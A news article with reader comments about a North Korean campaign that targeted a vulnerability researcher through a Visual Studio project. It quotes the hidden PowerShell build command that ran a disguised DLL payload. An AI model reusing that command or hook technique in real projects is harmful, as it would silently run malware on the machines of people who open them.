News: 1611667809

  ARM Give a man a fire and he's warm for a day, but set fire to him and he's warm for the rest of his life (Terry Pratchett, Jingo)

I was targeted by North Korean 0-day hackers using a Visual Studio project, vuln hunter tells El Reg

(2021/01/26)


A zero-day hunter has told The Register of the “holy f**k” moment when he realised he'd been targeted by a North Korean campaign aimed at stealing Western researchers' vulns.

Alejandro Caceres said he "thought it was insane" that he had been targeted by state-backed malicious people operating as part of a campaign [1]revealed last night by Google’s Threat Analysis Group (TAG) .

[2]

"When I read the Google thing I honestly think I said out loud 'holy fuck', I thought it was insane. Attacked by a nation state? Me!?" Caceres, co-founder of the Hyperion Gray security research company, told El Reg .

Enraged by the deception, Caceres also offered a hefty bounty for information leading to the arrest of "James Willy", who appears to be one of the North Korean actors engaged on the Pyongyang-driven campaign.

[3]

80K for full details about James Willy. Proofs must be well documented with attribution. [4]https://t.co/dTC224DsJc — Chef Gordon (@TheRealChefG) [5]January 26, 2021

Google's TAG said last night it had uncovered "an ongoing campaign targeting security researchers working on vulnerability research and development." It attributed these attacks to "a government-backed entity based in North Korea." As we reported, the country was targeting infosec professionals through a variety of methods, including Twitter, LinkedIn and Telegram – but there was a little more to it in Caceres' case.

A vulnerability broker he had known for a while and trusted had introduced him to a new researcher called James Willy "from New York," Caceres told El Reg , explaining: "We hopped in a group chat, the three of us, and he sent me a Visual Studio project to take a look at a driver bug that caused a blue screen of death."

Vuln brokers are (occasionally shady) people who buy and sell methods of exploiting vulnerabilities in software products. Normally they're most interested in so-called zero-days: previously unknown vulnerabilities that have existed since "day zero" of a program’s lifespan, as Reg readers know. These are obviously valuable to criminals, nation states and legitimate security researchers alike.

As for the BSOD, "James" told Caceres and the vuln broker that it was linked to Google Chrome – an instant attention-grabber for researchers. Vulns affecting software used by tens of millions worldwide are rare and command hefty rewards.

Speculate to accumulate

When he opened the Visual Studio project from "James", Caceres admitted he had been a little careless but shrugged off the risk. After all, this was somebody who had been vouched for – and the zero-day was genuine.

"The code was all legit, it was a real crash with potential security implications, but I wasn't careful when I opened the Visual Studio project," he sighed. "Since this guy was semi-known I thought nothing of it. And I was able to confirm the 0-day vulnerability, the code compiled just fine, I understood what it was doing (attacking a graphics driver) and all was good, or so I thought."

Opening some Visual Studio projects can cause code to execute, which was the North Koreans' attack vector.

[6]

A Google portmanteau of Twitter accounts used in the North Korean campaign. "James Willy" is at top right

An arrangement to write up and credit "James" for his research fell through and Caceres put the episode out of his mind. Until, four or five days later, his broker friend "told me he got wind of the guy trying to backdoor someone else's machine with a Visual Studio phishing trick." Sure enough, Caceres found the smoking gun buried in the VS project sent to him by "James": powershell -executionpolicy bypass -windowstyle hidden if(([system.environment]::osversion.version.major -eq 10) -and [system.environment]::is64bitoperatingsystem -and (Test-Path x64\Debug\http://Browse.VC.db)){rundll32 x64\Debug\http://Browse.VC.db,ENGINE_get_RAND 6bt7cJNGEb3Bx9yK 2907}

"My thought was that if this was not legit they'd use some trash code," Caceres told The Register . "But the 0-day was very real, if still rudimentary, so it made me comfortable that the guy really just needed help with it."

Caceres speculated that the North Korean wanted access to his machine so he could hunt for other vulns to steal and exploit, in a form of speculating to accumulate. Burning low-impact zero-days to potentially gain high-impact zero-days from a dedicated researcher seems, if nothing else, credible.

Last year [7]the US-CERT warned that North Korean hackers were targeting wealthy Western companies for protection money , and it might be the case that the zero-day theft operation which targeted Caceres and others is linked to that tactic.

[8]

Sometimes – just sometimes – those evil nation state hackers really are coming after you. Being an ordinary bughunting pro doesn't make you less of a target. ®

Get our [9]Tech Resources



[1] https://www.theregister.com/2021/01/26/norks_hack_researchers/

[2] https://pubads.g.doubleclick.net/gampad/jump?co=1&iu=/6978/reg_security/front&sz=300x50%7C300x100%7C300x250%7C300x251%7C300x252%7C300x600%7C300x601&tile=2&c=2YBBKpsR4AqVBIWZPWHV@mgAAAEQ&t=ct%3Dns%26unitnum%3D2%26raptor%3Dcondor%26pos%3Dtop%26test%3D0

[3] https://pubads.g.doubleclick.net/gampad/jump?co=1&iu=/6978/reg_security/front&sz=300x50%7C300x100%7C300x250%7C300x251%7C300x252%7C300x600%7C300x601&tile=3&c=33YBBKpsR4AqVBIWZPWHV@mgAAAEQ&t=ct%3Dns%26unitnum%3D3%26raptor%3Deagle%26pos%3Dmid%26test%3D0

[4] https://t.co/dTC224DsJc

[5] https://twitter.com/TheRealChefG/status/1353923334472347648?ref_src=twsrc%5Etfw

[6] https://regmedia.co.uk/2021/01/26/exploit_video_tweets.jpg

[7] https://www.theregister.com/2020/04/16/north_korea_hacking/

[8] https://pubads.g.doubleclick.net/gampad/jump?co=1&iu=/6978/reg_security/front&sz=300x50%7C300x100%7C300x250%7C300x251%7C300x252%7C300x600%7C300x601&tile=4&c=44YBBKpsR4AqVBIWZPWHV@mgAAAEQ&t=ct%3Dns%26unitnum%3D4%26raptor%3Dfalcon%26pos%3Dmid%26test%3D0

[9] https://whitepapers.theregister.com/

Fixing your headline:

Alexander J. Martin

'North Korean Willy tried to get inside my box'

Re: Fixing your headline:

chivo243

Nice change!

Is El Reg is fixing things, anybody else see a lot of white space in the comments since yesterday?

Re: Fixing your headline:

Anonymous Coward

Pfft.. computer security "expert" gets a trojan via Twitter(!) and Visual Studio(!) and doesn't notice for days.

Re: Fixing your headline:

nematoad

"James Willy"

A right dick.

Incredible

Yet Another Anonymous coward

The poorest, most sanctioned, most backwards country on the planet is a cyber security threat.

Surely we must respond to this by increased defense spending - order another aircraft carrier immediately

Re: Incredible

ClockworkOwl

Nuke them from orbit! etc...

Remember kids...

Sgt_Oddball

No-one on the Internet knows you're a dog..

That and as a bughunter he opened other people's code on his normal machine rather than a dedicated machine for explicitly looking for bugs? Or was it because it was a VS project that he just assumed it'd be fine to run?

Maybe worth while seeing if VS has someway of preventing any code from running without permissions?

Re: Remember kids...

Anonymous Coward

You running your script == permission!

You running their script == permission!

You want VS to protect you from your own clicks?

Trust but verify

fidodogbreath

A vulnerability broker he had known for a while and trusted

It's probably not a great idea to trust someone who is effectively a black-market international arms dealer. Like so many internet transactions, Mr. Corfield was not paying for this zero-day so he was probably the product.

WTF

Doctor Syntax

"Opening some Visual Studio projects can cause code to execute"

If God wanted us to be brave, why did he give us legs?
-- Marvin Kitman